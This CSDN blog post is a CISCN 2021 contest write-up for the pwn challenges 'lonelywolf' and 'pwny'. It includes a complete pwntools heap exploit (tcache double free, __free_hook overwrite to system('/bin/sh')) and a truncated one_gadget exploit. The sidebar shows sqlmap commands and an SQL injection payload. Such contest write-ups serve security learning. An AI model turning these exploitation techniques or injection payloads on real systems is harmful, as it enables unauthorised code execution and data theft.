2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分

最新推荐文章于 2024-07-21 16:28:06 发布
最新推荐文章于 2024-07-21 16:28:06 发布
阅读量1w 收藏 25
点赞数 12
分类专栏: 网络安全 ctf pwn 文章标签: 网络安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A951860555/article/details/116910945
版权
本文详述了作者在2021年全国大学生信息安全竞赛中遇到的pwn题目,包括题目概述、利用方式分析及解题思路。涉及了堆利用、libc地址泄露、沙箱机制绕过等技术,分享了针对不同题目的多种解决方案。
摘要由CSDN通过智能技术生成

CISCN_2021_WP

概述

  作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,心态爆炸,比赛结束。我看过的pwn题大概是这样构成的,pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。

ciscn_2021_lonelywolf

  ciscn_2021_lonelywolf
  这是我做出来的那道pwn题,这个pwn题整体说来不算难,是比较常规的pwn题,使用libc-2.27.so,比赛给的libc版本存在tcache double free检测,需要绕过。这一点和我平时在BUUCTF oj 上练习的版本以及自己在官网上找的debug版本好像有所区别,虽然同样是libc-2.27.so,但这些版本并不存在tcache double free检测。
  下面对题目简单分析一下,题目保护全开,整个题目实现了增删查改四个功能,这里有个trick,每个功能会要求输入对应的index,但实际上并没有用,因为题目只会保留最新的一个堆块指针和大小,并没有使用链表或者数组之类的结构来存储堆块指针。当然index会作为判断条件之一,我们只需要输入0,让if检测通过即可。如下图所示,展示了这个trick:

index
  如下面两个截图所示,是这道题目存在的两个漏洞,第一个漏洞是在edit功能里面,这里存在off_by_null,不过我的利用方式中并没有使用这个漏洞,所以这道题是存在多种不同的利用方式的。然后第二个漏洞在free功能里面,存在明显的UAF漏洞。

off_by_null
uaf
  接下来介绍下我的利用思路,由于题目限制了alloc的chunk大小,所以无法申请unsorted bin大小的堆块。所以这里首先构造double free,然后泄露出堆地址,计算出和tcache控制堆块head的偏移,然后在double free的基础上将堆块分配到head处。随后我们就可以修改控制堆块head的标志位,从而释放堆块到unsorted bin中,然后泄露处libc的地址。这里我们修改0x250的chunk标记位0xff,随后释放这个tcache控制堆块head,大小刚好也就是0x250,所以之后head会进入unsorted bin,此时利用我们就能leak出libc地址了。之后同样是修改tcache控制堆块head的一些标记,将 free_hook-0x8 的地址填入0x40的tcache堆块指针中,随后申请相同堆块的大小就能将堆块分配到 free_hook-0x8 上,最后填入"/bin/sh\x00"+system,free即可获取shell。下面是完整的exp:

from pwn import *


ld_path = "/home/fanxinli/ctf_go/glibc-2.27-64/lib/ld-2.27.so"
libc_path = "/home/fanxinli/ctf_go/pwn/ciscn/lonely/libc-2.27.so"
p = process([ld_path, "./lonelywolf"], env={
   "LD_PRELOAD":libc_path})
# context.log_level = "debug"

def new(size):
    p.recvuntil("Your choice: ")
    p.sendline("1")
    p.recvuntil("Index: ")
    p.sendline("0")
    p.recvuntil("Size: ")
    p.sendline(str(size))


def edit(con):
    p.recvuntil("Your choice: ")
    p.sendline("2")
    p.recvuntil("Index: ")
    p.sendline("0")
    p.recvuntil("Content: ")
    p.sendline(con)


def show():
    p.recvuntil("Your choice: ")
    p.sendline("3")
    p.recvuntil("Index: ")
    p.sendline("0")


def free():
    p.recvuntil("Your choice: ")
    p.sendline("4")
    p.recvuntil("Index: ")
    p.sendline("0")

# leak heap addr
new(0x78)
free()
edit("a"*0x10)   # bypass tcache double free
free()
show()
#  print(p.recv())
p.recvuntil("Content: ")
info = p.recvuntil("\n", drop=True)
info = u64(info.ljust(8, b"\x00"))
print(hex(info))

# alloc to tcache control head
head = info-0x250
new(0x78)
edit(p64(head))
new(0x78)
new(0x78)

# free head --> leak libc
pad = p64(0)*4+p64(0x00000000ff000000)
edit(pad)
free()
show()
p.recvuntil("Content: ")
info = p.recvuntil("\n", drop=True)
info = u64(info.ljust(8, b"\x00"))
print(hex(info))

# count
libc = ELF("/home/fanxinli/ctf_go/pwn/ciscn/lonely/libc-2.27.so")
base = info-0x70-libc.sym["__malloc_hook"]
sys = base+libc.sym["system"]
f_hook = base+libc.sym["__free_hook"]
print("f_hook: ", hex(f_hook))
print("sys: ", hex(sys))

# alloc to free_hook-0x8
new(0x40)
edit(p64(0)*4)
new(0x10)
edit(p64(f_hook-8)*2)
new(0x40)
edit(b"/bin/sh\x00"+p64(sys))
free()

p.interactive()

ciscn_2021_pwny

  ciscn_2021_pwny

第一种利用方式

  这道题是pwn题里面分值最低的一道,但是最后我看解题人数,这道题做出来的人反而比上面一道还要少。我个人觉得这道题也并不算难,代码量也比较少,不过利用思维确实比较巧妙,也考了一个scanf函数在遇到过长输入时会申请堆的知识点。我当时就是卡在最后一步,不知道scanf函数可以申请堆块,也就无法利用one_gadget。
  下面简单分析一下这道题目,这道题目同样保护全开,只有read和write两个功能,都是往bss段上读写数据,并没有使用malloc或者free之类的函数,看起来好像和堆利用无关。
  如下图所示,题目一开始读取了产生随机数的文件,并将其返回值作为后面read和write的第一个参数,所以这里我将其命名为fd,注意这个值是存储在bss段上的。

init
  再看下面两个截图,分别是write和read函数的具体实现,write函数先会让我们输入index,也就是后面的offset,接着调用read从fd中读取值,并将该值覆盖到bss_data中offset偏移处,bss_data也是位于bss段。注意这里存在溢出,也就是偏移可以任取,为正,为负,为很大的数都可以,这也是本题的漏洞所在。再看read的功能实现,和write相似,但是read只是打印bss_data偏移为offset处的数据。所以我们可以将write视为具有edit功能,read具有show的功能。

write
read
  下面介绍下利用思路,当时比赛时做这道题一开始也很蒙蔽,因为fd是随机产生的,程序动不动还会运行出错。所以这里第一步就是改fd的值,参见下面的代码,改fd非常简单。前面我们说了,write具有edit功能,可以用偏移的方式修改bss段上的数据,因此找好fd的偏移,调用两次write写fd位置就会将fd置为0,此时就正常获取我们的输入了。然后第二步就是利用read具有的show功能,找好bss和data上的数据泄露出来,我们就可以获取libc和代码基地址。最后就是利用scanf读取过长的输入时会分配chunk,也就是说会使用malloc_hook,此时就可以在malloc_hook处写入one_gadget。当然直接写one_gadget不一定成功,还需要realloc还调整一下,完整exp如下,这是我本地调试的结果,其中的one_gadget和realloc的偏移会和比赛环境的不一样。

from pwn import *

ld_path = "/home/fanxinli/ctf_go/glibc-2.27-64/lib/ld-2.27.so"
# libc_path = "/home/fanxinli/ctf_go/pwn/ciscn/pwny/libc-2.27.so"
# p = process([ld_path, "./pwny"], env={"LD_PROLOAD":libc_path})
# context.log_level = "debug"
#   p = remote("124.71.230.113", 24425)
p = process([ld_path, "./pwny"])


def write(idx):
    p.recvuntil("Your choice: ")
    p.sendline("2")
    p.recvuntil("Index: ")
最低0.47元/天 解锁文章
__lifanxin
关注
专栏目录
WP-CISCN2021
ce666666的博客
06-14 1万+
前言 这次比赛让我看到只学习一门方向的痛苦。web平台修复,队友在疯狂做题,你却只能在旁边看着却不能帮助。有些题就是悍得悍死,捞得捞死。 Web 简单的注入 一道延时注入,我却在反复测试是否为联合还是其他注入,尝试fuzz,手工注入真的菜。 还是得靠sqlmap注入 Payload: 爆库:sqlmap.py –r txt –risk=3 --level=3 –p password –dbs 爆表:sqlmap.py –r txt –risk=3 –-level=3 –p password –D “数据库名
CISCN 2021 题目复现
树木常青的博客
05-21 1614
前言 ciscn大概是自己学习网安以来参加的第一个比较正式的比赛吧,发现自己比想象的还菜,一个没做出来。。。还好赛后可以照着大佬们的wp复现,记录一下自己复现过程中的一些问题和收获(想复现的话建议直接跳转到文章结尾看羽师傅的文章)。(这只是菜鸡的一些学习记录,欢迎指出错误,大佬请略过) upload(buu复现) 1,用这个绕过getimagesize函数,第一次知道。 #define width 1 #define height 1 2,unicode配结合mb_strtolower()函数绕过,但不知
安全知识竞赛信息/第十四届全国大学生信息安全竞赛创新实践能力赛成功举办_新手白客自学
最新发布
2401_84915584的博客
07-21 322
华中科技大学网络空间安全学院副院长陈凯在致辞中表示,全国大学生信息安全大赛创新实践能力赛是信息安全行业非常权威的赛事,已入选全国大学生竞赛排行榜A级。
2021CISCN RE WP
qq_45739995的博客
05-17 451
逆向题质量太高了,菜鸡比赛只做出来两个题。 其他的题会在赛后继续复现出来。 持续更新中… glass jeb打开主函数发现调用了native层 ida打开 输入长度39位 第一个函数跟进发现调用了rc4 第二个函数用v7对flag加密(数组移位+异或) 第三个直接对flag加密(三位一组进行加密处理+异或) 大体思路:根据已有的字符串,首先逆掉第三个函数 得到用rc4数组加密后的 然后求出rc4的数组 最后在第二个函数里进行异或拿到flag (变量名用的有点乱) #include<stdio.h&
CISCN2021第十四届全国大学生信息安全竞赛初赛-writeup
../../../../../../../
05-17 4471
这一次比赛分为三张“卷子”,我就直接归在一起吧 场景实操Misctiny trafficrunning_pixel Misc tiny traffic 打开流量包 根据文件和题目描述,我们直接导出http对象 可以看到,列表里面含有gzip和br文件,Gzip是一种压缩文件格式并且也是一个在类 Unix 上的一种文件解压缩的软件,BR文件是使用Brotli(一种开源数据压缩算法)压缩的文件 导出来后对这几个gzip和br文件解压缩,先看看flag_wrapper 并没有啥实质性的内容 看看test和se
2021全国大学生信息安全竞赛初赛部分WP
weixin_45844670的博客
05-17 4066
第一阶段 Misc tiny traffic 分析pcap包,能发现几个可疑的请求——/flag_wrapper、/test、/secret,分别把它们传输的文件提取出来,得到三个压缩包,通过flag.gzip的内容可以确认这个IP就是我们要分析的IP 再使用Peazip分别提取secret和test的压缩包,能发现传输的格式规范 syntax = "proto3"; message PBResponse { int32 code = 1; int64 flag_part_convert_to_h
2021 全国大学生信息安全竞赛ciscn web wp
midi
05-19 2055
2021 ciscn web wpupload 复现几道没做出来的题:> upload 发现文件index.php、example.php 知识点1:绕过getimagesize 在上传的文件最后面加上 #define width 1 #define height 1 知识点2:绕过zip字符中的i 结合 https://bugs.php.net/bug.php?id=77375 使用İ字符可以绕过i字符的匹配,如果php这三个字符也能绕过就能直接上传php了~~,官方中发现只能针对这几个字符
第十六届全国大学生信息安全竞赛CISCN---Cypto
lulu001128的博客
06-15 648
解题过程
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...
ciscn_2021_lonelywolf.zip
05-17
2021全国大学生信息安全竞赛pwn题。
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
WPCISCN2021初赛-WEB部分
車鈊的博客
06-06 806
WEB Easysql 模糊测试 发现columns,information,union(大小写)被过滤 报错回显点 UNION联合注入无法使用,测试登录发现报错点 回显位和库名 我们采用报错注入,用and做语法连接 // 测试列数 wyx123')and(select 1)# // 爆破库名 wyx123')and(select updatexml(1,concat(0x7e,database(),0x7e),1))# 列名的猜解-无列名注入 当我们构造连接查询,对其加上using限制(using:
[CISCN 2021] 部分 write up
Anton__1的博客
05-16 873
easy_source 抓包扫目录干都干了,发现什么都拿不到 预期猜测flag在注释里(也给了提示): 你能发现我嘛 所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释: 参考自https://r0yanx.com/2020/10/28/fslh-writeup/ payload如下: ?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment 因为不知道到底在那个函数中,随即手工爆破直到拿到flag
第14届(2021)CISCN初赛WP(2)——Glass
InterplanetaryW的博客
06-15 398
Glass Writeup 首先使用apktool将“glass.apk”文件反编译 结果如下,提取其中Classes.dex文件 利用dex2jar工具进行反编译得到jar文件 生成jar包 使用jd-gui打开jar包,看到源码 核心判断函数如图所示 可以发现判断是利用checkFlag()函数 checkFlag为native外部函数 使用ida打开提取出的libnative-lib.so动态链接库 分析结束后可以在函数列表中很容易找到checkFlag()函数 使用F5进行反编译
2021ciscn初赛web部分简单wp
weixin_45805993的博客
05-24 508
0x00. 简单的题不想写wp,难的题写不出来……这篇博客应该会比较水,不喜勿喷 0x01.easy_source Payload http://xxxxxxxxxx/index.php?rc=splFileobject&ra=.index.php.swo&ra=php://filter/read=convert.base64-encode/resource=index.php&rb=rb&rd=fgets 挺简单的,不细说了 用php原生类splFileObject,用ge
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN
Welcome To Myon'Blog !
05-27 1915
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN) Misc 1、被加密的生产流量 Crypto 2、Sign_in_passwd Web 3、unzip 4、dumpit Re 5、babyRE Pwn 6、funcanary
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 861
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论 21
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值